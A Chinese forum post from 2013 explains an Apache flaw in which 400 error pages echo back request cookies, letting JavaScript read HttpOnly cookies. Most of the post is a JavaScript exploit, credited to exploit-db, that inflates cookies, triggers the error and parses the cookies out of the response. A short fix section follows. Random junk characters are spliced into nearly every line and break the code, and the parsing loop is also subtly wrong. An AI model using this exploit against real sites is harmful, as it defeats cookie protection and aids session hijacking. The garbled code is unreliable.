很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。3 q5 X+ D( K0 {! D) Y) G
( s P3 J6 B5 J; T6 L7 ~8 r$ ]
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:7 @: X+ b* u% m' f
2 d. [1 N9 M- s1 x. j X9 B- ?% T$ {5 f1 k
// http://www.exploit-db.com/exploits/18442/
$ M* n" ^2 _) k1 N# p& |8 F- r, ?function setCookies (good) {
) O R- `, Q) g% {// Construct string for cookie value7 x9 R. w& H- i
var str = "";/ K( b7 p* C/ p( H0 N1 T
for (var i=0; i< 819; i++) {
" s. w% F# z' B+ K A9 `$ Wstr += "x";7 R/ `, S+ m. J9 Q4 `" M! V6 l
}7 W n8 m) j! m' r
// Set cookies
2 X8 E$ V- @9 e1 B, n ]4 B3 Tfor (i = 0; i < 10; i++) {
8 A& l0 ?9 G4 _! u9 J, ?# g// Expire evil cookie' z9 f6 R1 N6 ~5 t' E4 T, R
if (good) {6 N6 E- ^/ u" Q1 J
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
# z6 w- z: I$ b6 z$ @6 N}
8 s2 a! T' W& t6 ~7 ^. `// Set evil cookie6 ~6 N0 M: ^, o# {3 f
else {
" I- N, h2 @6 v! u- Q' e' a Fvar cookie = "xss"+i+"="+str+";path=/";9 \; }/ b" E. [0 |0 R. K5 z
}
, w4 V2 T/ |: [# I6 M& N4 mdocument.cookie = cookie;0 L' e8 x& \; F- O: H
} Z9 {2 m7 |2 Y( b6 u( g8 T% c L
}
; `$ s4 x3 k7 d7 }( u9 N$ o% Z6 O* Vfunction makeRequest() {5 `: ]4 J1 [! L' F( O
setCookies();2 u2 M& M: w) E+ ^4 z- M6 j- `4 [
function parseCookies () {
) x) Z/ U, A! j3 Z* f4 M6 H. Kvar cookie_dict = {};8 h" i0 W: X3 U+ I1 Z: X/ \
// Only react on 400 status9 g* Q( r/ E4 {5 ~* F; t
if (xhr.readyState === 4 && xhr.status === 400) {) ]/ L" m, |4 Z% Q
// Replace newlines and match <pre> content! j9 |- M/ c" t, E1 r! x+ V
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
8 c( M. P( X3 R: Y% ^8 h5 A* k% Qif (content.length) {
! ^1 S4 V" Z- B/ O6 c// Remove Cookie: prefix
6 a. L# O6 C" }& Ccontent = content[1].replace("Cookie: ", "");$ T# w, X" b9 i, L* S6 v- K$ l' x9 Z Q
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
! ?8 U1 ?4 e. w6 e+ [8 s& y// Add cookies to object# e3 M: t$ u( o2 J; z* J
for (var i=0; i<cookies.length; i++) {! x1 v. E5 c+ X9 Y, f
var s_c = cookies.split('=',2);8 A; v) B0 U: `: k5 ]; z# {9 p( c' j
cookie_dict[s_c[0]] = s_c[1];; c) @ r1 \3 [) B0 D
}' y- p$ w) m( ? u
}
% ]3 _9 g. q- ^) o// Unset malicious cookies
" \0 Q/ l# c' g7 e( {setCookies(true); f( M" j$ `9 a1 ^1 V8 `4 J% ]
alert(JSON.stringify(cookie_dict));- H/ G7 x+ G' X; B; d
}
, n- U R7 G1 d) f" |! i8 Z}
* T9 q. j) Q8 P) d8 R6 b) \// Make XHR request
$ o, r9 |( S9 y+ y+ }. N& ?4 Wvar xhr = new XMLHttpRequest();
8 i( `6 K5 W! D" ixhr.onreadystatechange = parseCookies;
% Y$ R, [" `0 m% A2 r7 b7 z# yxhr.open("GET", "/", true);
6 r) K9 P/ W" E; P* J2 r5 cxhr.send(null);
. m4 z# F& [* [9 r5 t, F}3 V5 O: r5 [; L; a
makeRequest();
# R& q+ |# F4 D7 k# Z& S- {* J5 X; ]2 o7 U, S0 [
你就能看见华丽丽的400错误包含着cookie信息。
% S V- V, Z( m6 h' l
9 G' P$ f6 W! b$ F下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#. J1 M9 y; L: c7 J% z8 B
6 ~2 E) T: C/ R& s修复方案:* V, Z7 ], o( A6 @
) Z- j" H O& d0 f- v/ cApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
! `, C1 N% K5 G8 W' G+ O; B" d
' n v2 h0 j2 j9 L! sIn the event of a problem or error, Apachecan be configured to do one of four things,
+ R R5 E9 l( }
) V" W% ~& L, Z9 r1. output asimple hardcoded error message输出一个简单生硬的错误代码信息' N0 u+ x) G) a
2. output acustomized message输出一段信息
( B: j& ]: A, D/ m. q% S/ D3 j6 ^3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 ; d1 D) R! w5 i7 A& f* p
4. redirect to an external URL to handle theproblem/error转向一个外部URL
1 e% ~* K4 {' r# N& s& O5 P6 k5 s9 g$ y& _3 r7 \
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
m. i" U, T8 U$ |) ~3 O7 ~4 l1 O& z4 V/ @/ a4 x9 u
Apache配置:6 m. B; o& f- U5 n1 f
) y) j! e9 a. D% ]' x" h( mErrorDocument400 " security test"
6 w" S d( a! k/ s/ D3 [. N* c
9 D0 `+ S" U. M, H( @" L/ H4 k当然,升级apache到最新也可:)。. U0 ]9 P0 ~& ]
! [! p3 b4 J$ l6 M+ F: X X' [
参考:http://httpd.apache.org/security/vulnerabilities_22.html
* V: h8 w9 H( P7 L& W; A% ?6 i. [6 B3 }8 w- u0 g
|
发表于 2013-4-19 19:15:43
收藏
支持
反对